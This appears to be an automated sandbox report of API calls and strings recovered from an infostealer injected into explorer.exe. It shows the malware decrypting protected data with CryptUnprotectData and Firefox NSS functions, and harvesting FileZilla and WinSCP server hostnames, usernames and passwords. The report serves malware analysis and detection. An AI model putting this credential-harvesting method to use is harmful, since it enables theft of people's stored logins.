                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 117552131-0
                                                                                                                          • Opcode ID: 19b969e945ee68b53dd01f98b0664795b2f6f3bc2349bd488ae548df9d41be99
                                                                                                                          • Instruction ID: 626a02bfc40a176afbfc5fd98398beb96c9cb6569f876f7d93d3eaf3c0fbda0a
                                                                                                                          • Opcode Fuzzy Hash: 19b969e945ee68b53dd01f98b0664795b2f6f3bc2349bd488ae548df9d41be99
                                                                                                                          • Instruction Fuzzy Hash: 8801A271604305AFE318CF16CC89FBBB7ACEB81665F00462EF505D2240DBA1DC018A70
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,774CF360,00000000,?,00000000,?,029746E3), ref: 029711ED
                                                                                                                          • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0297120F
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02971231
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 117552131-0
                                                                                                                          • Opcode ID: 5307bc7506f8ee82ac1e42f04ef99a4d68e14ec135034389f5e513933e8f97a5
                                                                                                                          • Instruction ID: d06882be6f079006b9d9a6265473a2268adb510602ffada15e043a380915cb81
                                                                                                                          • Opcode Fuzzy Hash: 5307bc7506f8ee82ac1e42f04ef99a4d68e14ec135034389f5e513933e8f97a5
                                                                                                                          • Instruction Fuzzy Hash: 45F0907260830E7BE2109E56DC80FB7BB9DDFD16A8F15042EB601D2181DEA2ED0986B4
                                                                                                                          APIs
                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02971FFA
                                                                                                                          • RtlMoveMemory.NTDLL(?,?,?), ref: 02972015
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CryptDataMemoryMoveUnprotect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2807545630-0
                                                                                                                          • Opcode ID: f76e6d2c320ccb3e2fec50a739b4aba6a143ba593232c4cb48dc265811a0969d
                                                                                                                          • Instruction ID: 29b298f0d2cbe584d86b5c58683553ae640ff9b2bea3dc21f3b9b9fa94f07cc5
                                                                                                                          • Opcode Fuzzy Hash: f76e6d2c320ccb3e2fec50a739b4aba6a143ba593232c4cb48dc265811a0969d
                                                                                                                          • Instruction Fuzzy Hash: 6801ECB1F11219AB9B25DF9AE884DBFBBFCEF45650B10046AF905E3200D7719A10CBA0
                                                                                                                          APIs
                                                                                                                          • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 029711B2
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 029711D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BinaryCryptHeapString$AllocateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3825993179-0
                                                                                                                          • Opcode ID: 5c57eb93d3ca2cf5c6f65512d1dbb96ada3dcb784f3b19b9261018100361325a
                                                                                                                          • Instruction ID: 74b4379c830fb2943f32daaff185a04866ab4b79bca4167bcb619759b2498396
                                                                                                                          • Opcode Fuzzy Hash: 5c57eb93d3ca2cf5c6f65512d1dbb96ada3dcb784f3b19b9261018100361325a
                                                                                                                          • Instruction Fuzzy Hash: A0F0A73260011877D720C597DC85DFBFB6DEFC56B5B100169F90DE7141DA629D0487A0
                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.COMBASE(029C62B0,00000000,00000001,029C62A0,?), ref: 0297445F
                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 029744AA
                                                                                                                          • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0297456E
                                                                                                                          • lstrcmpiW.KERNEL32(Servers,?), ref: 0297457D
                                                                                                                          • lstrcmpiW.KERNEL32(Settings,?), ref: 0297458C
                                                                                                                            • Part of subcall function 029711E1: lstrlenW.KERNEL32(?,774CF360,00000000,?,00000000,?,029746E3), ref: 029711ED
                                                                                                                            • Part of subcall function 029711E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0297120F
                                                                                                                            • Part of subcall function 029711E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02971231
                                                                                                                          • lstrcmpiW.KERNEL32(Server,?), ref: 029745BE
                                                                                                                          • lstrcmpiW.KERNEL32(LastServer,?), ref: 029745CD
                                                                                                                          • lstrcmpiW.KERNEL32(Host,?), ref: 02974657
                                                                                                                          • lstrcmpiW.KERNEL32(Port,?), ref: 02974679
                                                                                                                          • lstrcmpiW.KERNEL32(User,?), ref: 0297469F
                                                                                                                          • lstrcmpiW.KERNEL32(Pass,?), ref: 029746C5
                                                                                                                          • wsprintfW.USER32 ref: 0297471E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                          • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                          • API String ID: 2230072276-1234691226
                                                                                                                          • Opcode ID: 30ef1c07f6a60cf1e7a6160a6ed081aa051278765ee129203cd7c8fc4cb5d271
                                                                                                                          • Instruction ID: 8bed674b149ae6d8d24dae5f710afdfa3be102e37b0d3be659cd8111147ab008
                                                                                                                          • Opcode Fuzzy Hash: 30ef1c07f6a60cf1e7a6160a6ed081aa051278765ee129203cd7c8fc4cb5d271
                                                                                                                          • Instruction Fuzzy Hash: 4CB10771204306AFD700DF64C884E6AB7F9EFC9749F10895CF6898B261DB71E906CB62
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                            • Part of subcall function 02971090: lstrlenW.KERNEL32(?,?,00000000,029717E5), ref: 02971097
                                                                                                                            • Part of subcall function 02971090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 029710A8
                                                                                                                            • Part of subcall function 029719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02972CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 029719C4
                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 02972503
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0297250A
                                                                                                                          • LoadLibraryW.KERNEL32(00000000), ref: 02972563
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 02972570
                                                                                                                          • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 02972591
                                                                                                                          • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0297259E
                                                                                                                          • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 029725AB
                                                                                                                          • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 029725B8
                                                                                                                          • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 029725C5
                                                                                                                          • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 029725D2
                                                                                                                          • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 029725DF
                                                                                                                            • Part of subcall function 0297190B: lstrlen.KERNEL32(?,?,?,?,00000000,02972783), ref: 0297192B
                                                                                                                            • Part of subcall function 0297190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02972783), ref: 02971930
                                                                                                                            • Part of subcall function 0297190B: lstrcat.KERNEL32(00000000,?), ref: 02971946
                                                                                                                            • Part of subcall function 0297190B: lstrcat.KERNEL32(00000000,00000000), ref: 0297194A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                          • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                          • API String ID: 3366569387-3272982511
                                                                                                                          • Opcode ID: 1fa8522e967e3dc700fef834f08aa48bab7e15210f2ad5aa11d1f18639dc87af
                                                                                                                          • Instruction ID: 9d75fb0d050f95870dbdb26b3872debd8754f97be6598e3677d755ca32bbc828
                                                                                                                          • Opcode Fuzzy Hash: 1fa8522e967e3dc700fef834f08aa48bab7e15210f2ad5aa11d1f18639dc87af
                                                                                                                          • Instruction Fuzzy Hash: CF410036E463418BDB14AF39A85453E3BEEDBC5650710083FE94AE3240DB748C42DF52
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02975BF5: memset.NTDLL ref: 02975C07
                                                                                                                          • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 029760E1
                                                                                                                          • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 029760EC
                                                                                                                          • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 02976113
                                                                                                                          • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0297618E
                                                                                                                          • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 029761B5
                                                                                                                          • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 029761C1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _alldiv$_allrem$memset
                                                                                                                          • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                          • API String ID: 2557048445-1989508764
                                                                                                                          • Opcode ID: 48769dc009b9e64672a5310fe8422f078904757d263a064708bc08815ea33156
                                                                                                                          • Instruction ID: e88cafdf0ded1ac8e58c58a0823c2dfea66def07c51eac86503bca3aaddcde9c
                                                                                                                          • Opcode Fuzzy Hash: 48769dc009b9e64672a5310fe8422f078904757d263a064708bc08815ea33156
                                                                                                                          • Instruction Fuzzy Hash: 2CB1AFB2A08742AFD7619E24CC84B3A7FDDFBD1348F65095DF882E61D0E721D910CA95
                                                                                                                          APIs
                                                                                                                          • memcmp.NTDLL(029C637A,BINARY,00000007), ref: 0298D324
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp
                                                                                                                          • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                          • API String ID: 1475443563-3683840195
                                                                                                                          • Opcode ID: 2efd4f34c8fc4f6d4e5d57e2f84b9aaaa457c37db6a061f2606e3b859efdcde9
                                                                                                                          • Instruction ID: 4275571cdec7a48fd16c9dad8e2b1fc20af4271e58c13666bbb24df02294bbc2
                                                                                                                          • Opcode Fuzzy Hash: 2efd4f34c8fc4f6d4e5d57e2f84b9aaaa457c37db6a061f2606e3b859efdcde9
                                                                                                                          • Instruction Fuzzy Hash: D051D231504340ABD715AF75CC40ABBB3EABB85604F180CAEF9569B2D1E370E905CBA2
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 029719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A1E
                                                                                                                            • Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A3C
                                                                                                                            • Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A75
                                                                                                                            • Part of subcall function 029719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A98
                                                                                                                            • Part of subcall function 0297482C: lstrlenW.KERNEL32(?), ref: 02974845
                                                                                                                            • Part of subcall function 0297482C: lstrlenW.KERNEL32(?), ref: 0297488F
                                                                                                                            • Part of subcall function 0297482C: lstrlenW.KERNEL32(?), ref: 02974897
                                                                                                                          • wsprintfW.USER32 ref: 029749A7
                                                                                                                          • wsprintfW.USER32 ref: 029749B9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                          • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                          • API String ID: 2889301010-4273187114
                                                                                                                          • Opcode ID: cb35403b49e535d7d7c4610be2dc51498f98d6b7cbdda6d51d82691127de9721
                                                                                                                          • Instruction ID: 1bd21cbdf71cf1974dde0b47112681bc5a84c2f2c5810b7067cbd836757e9a84
                                                                                                                          • Opcode Fuzzy Hash: cb35403b49e535d7d7c4610be2dc51498f98d6b7cbdda6d51d82691127de9721
                                                                                                                          • Instruction Fuzzy Hash: 2F31E426B043546BD710AB65CC4492BB6FEFFCAF88B15492DF04997241DBB2DC018BA2
                                                                                                                          APIs
                                                                                                                          • memcpy.NTDLL(?,?,?,?,00000000), ref: 0297FB32
                                                                                                                          • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0297FB4D
                                                                                                                          • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0297FB60
                                                                                                                          • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0297FB95
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: -journal$-wal$immutable$nolock
                                                                                                                          • API String ID: 3510742995-3408036318
                                                                                                                          • Opcode ID: 8be47073428cc6fa6d29a5e6d9420b5b2d78234572545a345cee94552d05f15c
                                                                                                                          • Instruction ID: d32d42de1f455b38343ac306e3eeae9b8b003aa73ab1eadd0d1a7f575ef6a43d
                                                                                                                          • Opcode Fuzzy Hash: 8be47073428cc6fa6d29a5e6d9420b5b2d78234572545a345cee94552d05f15c
                                                                                                                          • Instruction Fuzzy Hash: A1D1B2B16083419FDB14DF28C880B2ABBE6AFD5314F18456DEC999B391E775D804CF62
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %$-x0$NaN
                                                                                                                          • API String ID: 0-62881354
                                                                                                                          • Opcode ID: 13791b943334541f1abfee32d520549fe02b031f5a15e521c54a5789260038a6
                                                                                                                          • Instruction ID: ec2b81652d691b7cf63983a415b5396f87ea86e0873c804f35b9a20ec5ec82fb
                                                                                                                          • Opcode Fuzzy Hash: 13791b943334541f1abfee32d520549fe02b031f5a15e521c54a5789260038a6
                                                                                                                          • Instruction Fuzzy Hash: A9D1D330A0C7828BD7258A6884907BBFFE9AFCA208F18496DF8C197351D764C945CB92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: -x0$NaN
                                                                                                                          • API String ID: 0-3447725786
                                                                                                                          • Opcode ID: 1872ff66b82106bfbfd3324037a87637e6b5fbcd1dba27487417621f44d014d3
                                                                                                                          • Instruction ID: a430e4774a26fe7240c2804cd9d3784e3e93612c1da6f017441461021249dbef
                                                                                                                          • Opcode Fuzzy Hash: 1872ff66b82106bfbfd3324037a87637e6b5fbcd1dba27487417621f44d014d3
                                                                                                                          • Instruction Fuzzy Hash: 71E1E530A0C7828FD7258E68C4907BBFFE9AFCA208F18496DE8D597351D764C945CB92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: -x0$NaN
                                                                                                                          • API String ID: 0-3447725786
                                                                                                                          • Opcode ID: 6a8d5d91bbbd4d1bb7eb7a26c7580308d43e487d2c931f996723dc8528ce691f
                                                                                                                          • Instruction ID: cb15c24dd248b5bf911b02be9af04c1d1a891eead185fea2f8ba456083913bf7
                                                                                                                          • Opcode Fuzzy Hash: 6a8d5d91bbbd4d1bb7eb7a26c7580308d43e487d2c931f996723dc8528ce691f
                                                                                                                          • Instruction Fuzzy Hash: 86E1D37060C7828FD7258E6884907BBFBEAAFCA308F18496DF8C597351D764C945CB92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: -x0$NaN
                                                                                                                          • API String ID: 0-3447725786
                                                                                                                          • Opcode ID: b1e04cac4cba108dc8f221361dcc71a9579e327f1ba7459e95575db1420db3c4
                                                                                                                          • Instruction ID: 097bcc89e0a7e8aed8fab4e17bca3166564095b08857c344657f8113f4c48904
                                                                                                                          • Opcode Fuzzy Hash: b1e04cac4cba108dc8f221361dcc71a9579e327f1ba7459e95575db1420db3c4
                                                                                                                          • Instruction Fuzzy Hash: F0E1E330A0C7828FD7258E6884907BAFFE9AFC9208F18496EE8C597351D774C945CB92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: -x0$NaN
                                                                                                                          • API String ID: 0-3447725786
                                                                                                                          • Opcode ID: 946e524f68a7bb86034ca7a16eccbe8b7b6f740f405fb6f9d605fe3361d109db
                                                                                                                          • Instruction ID: 4c368b687350666fd90848a9d9a5fb1b03842a8b0698363df256f11ca083e1f6
                                                                                                                          • Opcode Fuzzy Hash: 946e524f68a7bb86034ca7a16eccbe8b7b6f740f405fb6f9d605fe3361d109db
                                                                                                                          • Instruction Fuzzy Hash: 6BE1D47060C7828FD7258E6884947BAFFE9AFCA308F18486DF8C597351D764C945CB92
                                                                                                                          APIs
                                                                                                                          • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0297720E
                                                                                                                          • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 02977226
                                                                                                                          • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0297727B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _aulldvrm$_aullrem
                                                                                                                          • String ID: -x0$NaN
                                                                                                                          • API String ID: 105165338-3447725786
                                                                                                                          • Opcode ID: 31eb5595d92d2bd72e33c450c55a4f62c4ae0ae84be5d26e3ad54a7eeb3d3971
                                                                                                                          • Instruction ID: 14d95ec01a017a3ad07e44ab94e3645fd5fb9830f74e963def9b0293f5ac27cf
                                                                                                                          • Opcode Fuzzy Hash: 31eb5595d92d2bd72e33c450c55a4f62c4ae0ae84be5d26e3ad54a7eeb3d3971
                                                                                                                          • Instruction Fuzzy Hash: A6D1E47060C7828FD7258E6884907BBFFE9AFCA208F18586DF8C597351D764C945CB92
                                                                                                                          APIs
                                                                                                                          • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 02978AAD
                                                                                                                          • _allmul.NTDLL(?,?,0000000A,00000000), ref: 02978B66
                                                                                                                          • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 02978C9B
                                                                                                                          • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 02978CAE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _allmul$_alldvrm
                                                                                                                          • String ID: .
                                                                                                                          • API String ID: 115548886-248832578
                                                                                                                          • Opcode ID: 0938f6dc854d2a8e69ec9471accf5980eb2f6ca3df13cd2dcd735461e1f817c4
                                                                                                                          • Instruction ID: 813bc81977d33c469f0c3d90d384ee4be3a267e792a4772580c65d775d3c6889
                                                                                                                          • Opcode Fuzzy Hash: 0938f6dc854d2a8e69ec9471accf5980eb2f6ca3df13cd2dcd735461e1f817c4
                                                                                                                          • Instruction Fuzzy Hash: 41D1F1B194D7858BC7249F18888832ABBF5FFC5314F084D6EF6C996281E3B18945DB86
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: ,$7$9
                                                                                                                          • API String ID: 2221118986-1653249994
                                                                                                                          • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                          • Instruction ID: 4373f2a05c5a0b78370a40624d183693e388f798f7d9394c69ed0199a41be1de
                                                                                                                          • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                          • Instruction Fuzzy Hash: BE3181715083849FD730DF64D880B8FBBE9AFC9350F00492EE98997251EB719548CBA3
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(00000000,00000000,?,02972E75,PathToExe,00000000,00000000), ref: 02971BCC
                                                                                                                          • StrStrIW.SHLWAPI(00000000,.exe,?,02972E75,PathToExe,00000000,00000000), ref: 02971BF0
                                                                                                                          • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02972E75,PathToExe,00000000,00000000), ref: 02971C05
                                                                                                                          • lstrlenW.KERNEL32(00000000,?,02972E75,PathToExe,00000000,00000000), ref: 02971C1C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen
                                                                                                                          • String ID: .exe
                                                                                                                          • API String ID: 1659193697-4119554291
                                                                                                                          • Opcode ID: 57a5d9f7009d02f15797836b9e57e5115c5c167f8571dd4565d18724acb0a647
                                                                                                                          • Instruction ID: 5c0822f743595d87768fa23daf5033e37427b9a697efa45b8f76faa8dc7e19dc
                                                                                                                          • Opcode Fuzzy Hash: 57a5d9f7009d02f15797836b9e57e5115c5c167f8571dd4565d18724acb0a647
                                                                                                                          • Instruction Fuzzy Hash: 75F0F631B542209BE3386FB5AC44BBB63ACEF813417245C2EE14AD3190FB608941D759
                                                                                                                          APIs
                                                                                                                          • _allmul.NTDLL(?,00000000,00000018), ref: 0298316F
                                                                                                                          • _allmul.NTDLL(-00000001,00000000,?,?), ref: 029831D2
                                                                                                                          • _alldiv.NTDLL(?,?,00000000), ref: 029832DE
                                                                                                                          • _allmul.NTDLL(00000000,?,00000000), ref: 029832E7
                                                                                                                          • _allmul.NTDLL(?,00000000,?,?), ref: 02983392
                                                                                                                            • Part of subcall function 029816CD: memset.NTDLL ref: 0298172B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _allmul$_alldivmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3880648599-0
                                                                                                                          • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                          • Instruction ID: 6c2391df6bef467ccef3a615113a9ff22f9a8d45b68b7f535ee1e974ceedc6bc
                                                                                                                          • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                          • Instruction Fuzzy Hash: E9D19D716083418BDB24EF69C480B6EBBEAEFC4B04F18496EF99597250DB70D845CB86
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                                          • API String ID: 0-384346570
